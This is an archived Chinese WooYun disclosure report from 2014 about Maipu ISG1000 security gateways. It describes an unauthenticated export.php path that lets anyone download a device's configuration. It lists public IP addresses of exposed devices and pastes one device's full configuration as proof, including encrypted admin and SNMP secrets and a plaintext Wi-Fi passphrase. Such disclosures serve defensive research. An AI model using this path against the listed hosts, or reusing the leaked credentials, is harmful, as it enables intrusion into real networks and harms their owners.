乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-21: 细节已通知厂商并且等待厂商处理中 2014-10-26: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-12-20: 细节向核心白帽子及相关领域专家公开 2014-12-30: 细节向普通白帽子公开 2015-01-09: 细节向实习白帽子公开 2014-12-30: 细节向公众公开
rt
根据官网介绍迈普ISG1000系列网关存在9种产品
http://www.maipu.cn/productmes.aspx?id=2266
由于权限问题,导致网关配置文件未授权下载,以下利用方式:
https://url/system/maintenance/export.php?type=sc
https://122.224.165.114/login.htmlhttps://119.4.164.42/login.htmlhttps://61.143.203.86/login.html
<poc>
!configauthorized-table admin authorized read all authorized write all !user administrator admin local secret Hg6MAD7MGTUEcoT9gHG+LhDc6E07QwG71SmiEodL/fQT/YirzsAURqDjk69469y authorized-table admin user administrator admin authorized-address first 0.0.0.0/0!timezone 57!!wlan global configwlan-globalwlan country-code defaultwlan channel autowlan max-power defaultwlan radio-type 80211bgnwlan enable!interface bvi1 ip address 192.168.2.254/24 allow access https allow access http allow access ping allow access ssh allow access telnet!interface eth0 ip address 122.224.165.114/30 allow access https allow access http allow access ping allow access ssh allow access telnet!interface eth1 ip address 123.157.156.230/30 allow access https allow access http allow access ping allow access ssh allow access telnet!interface eth2 bridge-group 1!interface eth3 bridge-group 1!interface eth4 bridge-group 1 allow access https allow access http allow access ping allow access ssh allow access telnet!interface eth5 bridge-group 1!interface eth6 bridge-group 1!interface eth7 bridge-group 1!interface eth8 bridge-group 1!interface eth9 bridge-group 1!interface wlan0 ssid maipu ssid hide disable beacon interval default client max-count 30 client isolation disable dtim default security-mode wpa2 wpa2 auth-method psk maipu123 encry-method aes!!address!address lan description neiwang ip subnet 192.168.2.0/24!!address-group!!service!!service-group!service-group 常用服务!service-group 常用服务 member telnet member tcp member ping member dns member icmp member https member http!!schedule-day!!schedule-week!!schedule-month!!schedule-once!!user!!user-group!!!user-policy!!application-group p2p description p2p下载application-group 流媒体 description 流媒体软件application-group 网络游戏!!!policy any any any any any any p2p always deny 1 application 流媒体 application 网络游戏policy any any any any 常用服务 any any always permit 2 policy default-action permit !snmp community secret 6NSjZ2FJfHqUtCqRXdechDETsW7nP4FFcq1ujxx1HotuCZoZGsn14R7gwFVplw1 syslocation Beijing!dhcp share-net wlan0_dhcps subnet 192.168.0.1/24 share-net wlan0_dhcps 192.168.0.1 192.168.0.250 0 days 8 hours 0 mins share-net wlan0_dhcps gateway 192.168.0.1 share-net wlan0_dhcps dns 202.106.0.20 8.8.8.8!!router ospf!!ip route 0.0.0.0/0 122.224.165.113ip route 0.0.0.0/0 123.157.156.229 100 weight 100!!user-param!!user-webauth!!user-portal-server!ip nat source eth0 lan any any interface 1 ip nat source eth1 lan any any interface 2 !!!ip session limit!!!audit_log database onaudit_log syslog on!ip defend port-scan interface eth0 threshold 1000ip defend ip-sweep interface eth0 threshold 1000ip defend port-scan interface eth1 threshold 1000ip defend ip-sweep interface eth1 threshold 1000ip defend port-scan interface bvi1 threshold 1000ip defend ip-sweep interface bvi1 threshold 1000!qos-profile line 电信 limit both maxbandwidth ingress 20000 maxbandwidth egress 20000 match interface eth0!qos-profile channel 限速 parent 电信 bandwidth ingress 2000 maxbandwidth ingress 20000 bandwidth egress 2000 maxbandwidth egress 20000 perip ingress 2000 perip egress 2000 priority high match user any match application any!qos-profile channel def_电信 parent 电信!ha-config!end
密文应该是base64(3des(md5(xxx),keys))
</poc>
权限问题,你们懂的。
危害等级:无影响厂商忽略
忽略时间:2014-12-30 14:44
漏洞Rank:12 (WooYun评价)
暂无